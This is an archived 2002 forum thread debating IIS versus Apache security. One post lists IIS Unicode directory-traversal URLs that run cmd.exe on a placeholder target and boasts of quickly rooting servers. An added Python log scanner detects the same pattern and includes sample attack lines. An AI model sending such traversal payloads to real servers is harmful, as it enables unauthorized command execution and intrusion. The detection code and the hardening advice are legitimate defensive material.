-
April 15th, 2002, 03:55 PM
#1
The Power of IIS
What you need to know about running IIS and making use of it .... you'll find it here ...
1- IIS allows universal CrossSiteScripting
2- Remote control of IIS
3- Microsoft IIS local and remote DoS
4- All versions of Microsoft IIS Remote buffer overflow (SYSTEM Level Access)
5- Unchecked Buffer in ISAPI Extension Could Enable Compromise of IIS 5.0 Server
http://www.astalavista.com/library/auditing/webserver/
When the power of Love overcomes the Love of power, the world will know peace... Jimi Hendrix
-------------------------------------------------------------
I dream of giving birth to a child who will ask...... what was war?
-
April 15th, 2002, 07:19 PM
#2
-
April 15th, 2002, 08:12 PM
#3
Or you could just run Linux.
-
April 17th, 2002, 07:34 AM
#4
Yeah ... Linux will be a gr8 idea ...
-
April 21st, 2002, 07:34 AM
#5
Hey Dude!
I would never run an IIS 4,5 server if I were you!
I'm a specialist in bug finding in IIS 4, 5 and it's not small bugs there are.... Plenty of big Remote Bugs!
try:
****************************************************************************************************************
http://www.TARGET.dk/scripts/..%255c...exe?/c+dir+c:\
http://www.TARGET.dk/msadc/..%255c.....exe?/c+dir+c:\
http://www.TARGET.dk/cgi-bin/..%255c...exe?/c+dir+c:\
http://www.TARGET.dk/samples/..%255c...exe?/c+dir+c:\
http://www.TARGET.dk/iisadmpwd/..%25...exe?/c+dir+c:\
http://www.TARGET.dk/_vti_cnf/..%255...system32/cmd.exe?/c+dir+c:\
http://www.TARGET.dk/_vti_bin/..%255...system32/cmd.exe?/c+dir+c:\
http://www.TARGET.dk/adsamples/..%25...system32/cmd.exe?/c+dir+c:\
****************************************************************************************************************
Then you will get a DIR over the target server.... But this is on a fresh install but there are 1000s of bugs in these shitty IIS servers..... I run Apache and it's what I will say is the most stable server I have ever discovered! I have only positive words for Apache!
Give me 5 min and I will have a ROOT account on your IIS server!
-
April 21st, 2002, 03:41 PM
#6
I've posted the thread coz lots of members were asking about that issue ... as for me I don't even use it
-
April 22nd, 2002, 10:42 PM
#7
Senior Member
Assuming that Apache runs all these application mappings, correct?
I've been using it (IIS) for years now and never had any problems with hacks, nimda, or the like. The first thing I did back in March of 2000 when IIS 5 came out with Win2k was remove ALL application mappings, virtual directories and the like.
Sure I keep up with patches, but the exploits I find always target mappings I don't use. So I'm not too worried. I also write my own programs to monitor my server for suspicious activity and have had fun sending hackers to my http blackhole many times
I too, stay away from MS remote tools, I create my own, works much better
You can really get ROOT of IIS in under 5 minutes? If I e-mail you my server address would you feel free to root it for me, I will at least have peace of mind because rooting my own machine just doesn't satisfy me about the security setup I have.
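Added example, not part of any post in this thread: a small log monitor of the kind post #7 mentions, aimed at the double-encoded `..%255c` request pattern quoted in post #5. The log lines are constructed, the field order is an assumed W3C-style layout, and the function names are hypothetical.

```python
from urllib.parse import unquote

# Constructed sample lines (not real traffic). Assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2002-04-21 07:34:10 192.0.2.10 GET /default.htm - 200
2002-04-21 07:34:11 192.0.2.66 GET /scripts/..%255c..%255cexample/system32/cmd.exe /c+dir+c:\\ 200
2002-04-21 07:34:12 192.0.2.66 GET /msadc/..%5c..%5cexample/system32/cmd.exe /c+dir+c:\\ 404
2002-04-21 07:34:13 192.0.2.20 GET /docs/50%25-off.htm - 200
"""

def fully_decode(value, max_rounds=5):
    """Percent-decode until stable; return (decoded, passes that changed it)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value, encoding="latin-1")
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def classify(uri_stem):
    """Return the list of findings for one requested path."""
    decoded, rounds = fully_decode(uri_stem)
    # Treat backslash as a path separator, as a Windows server would.
    path = decoded.replace("\\", "/").lower()
    findings = []
    if rounds >= 2:                      # e.g. %255c -> %5c -> backslash
        findings.append("double-encoding")
    if ".." in path.split("/"):          # parent-directory segment after decoding
        findings.append("traversal")
    if path.endswith("/cmd.exe"):        # command interpreter requested over HTTP
        findings.append("cmd-interpreter")
    return findings

def scan(log_text):
    """Return (client_ip, raw_stem, findings) for every suspicious line."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7 or line.startswith("#"):
            continue
        findings = classify(fields[4])
        if findings:
            hits.append((fields[2], fields[4], findings))
    return hits

if __name__ == "__main__":
    for ip, stem, findings in scan(SAMPLE_LOG):
        print(ip, stem, ",".join(findings))
```

The single `%25` in the last sample line decodes once and stops, so a legitimate literal percent sign is not reported.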
-
April 22nd, 2002, 11:00 PM
#8
Originally posted here by knightmb
You can really get ROOT of IIS in under 5 minutes? If I e-mail you my server address would you feel free to root it for me, I will at least have peace of mind because rooting my own machine just doesn't satisfy me about the security setup I have.
Well, in my opinion, just having to keep up with the patches on IIS far outweighs its usefulness. That is, I don't like to have to patch a box every week for fear of getting the site defaced either through a worm or someone's "lack of something better to do." Running Apache, on the other hand, I'm usually happy to be able to read the CHANGES file at my relative leisure, then make a calculated decision if I need to recompile the thing or not... I'm happy to say that, mostly, there's not usually a huge rush to replace an Apache install for fear of it getting whacked - for the last few IIS vulnerabilities I've seen, usually the server's 0wn3d before you can get it replaced (ok, maybe not always that bad, but the urgency is usually severely heightened).
"Windows has detected that a gnat has farted in the general vicinity. You must reboot for changes to take effect. Reboot now?"
-
April 23rd, 2002, 12:19 AM
#9
Junior Member
There is no best one.
Microsoft's IIS and Apache HTTP are both equal. If they are both properly configured they are resistant to almost all attacks. But then there are a few exceptions like an exploit that allows a cracker access.
THE LARGEST REASON FOR WEB SERVERS AND BEING HACKED IS THE RESULT OF POOR ADMINISTRATION
Both IIS and Apache have exploits, but IIS's are more publicized. There is no webserver that is better than the other. If you rely on just the default settings you deserve to be hacked.
Networks should have multiple security defenses and plans, such as the following:
Border router
Perimeter network (DMZ)
software firewall
packet filtering/inspection from software or hardware
Change standard ports eg. Telnet, SSH
etc.
Just thought I would point that out.
If liking computers makes me a nerd, so be it, i am a computer nerd.
-
April 23rd, 2002, 01:25 AM
#10
Re: There is no best one.
Originally posted here by P4XEON
Microsoft's IIS and Apache HTTP are both equal. If they are both properly configured they are resistant to almost all attacks. But then there are a few exceptions like an exploit that allows a cracker access.
THE LARGEST REASON FOR WEB SERVERS AND BEING HACKED IS THE RESULT OF POOR ADMINISTRATION
I mostly agree with that, except:
1) Take both IIS and Apache out of the box and run it. Chances are, the Apache server is going to be reasonably configured and won't have any serious issues - the same is almost certainly not true for the IIS box.
2) Most "I can run a website" n00bs are going to probably want the point-and-clickness of something like IIS, and aren't going to bother to RTFM. This increases the problem significantly.
3) Looking at SecurityFocus and/or CERT (to mention only a couple), there are certainly more IIS warnings than Apache. Given market penetration of Apache, I'm unlikely to believe that it's "just because M$ is being targeted."
I can only conclude that, overall, IIS is going to be a much bigger burden to manage and/or admin than Apache. Plus, I don't need to run a GUI to run an efficient Apache server (kinda helps, since most of my machines I run without a head).
And has anyone ever tried to chroot an IIS instance or otherwise sandbox it?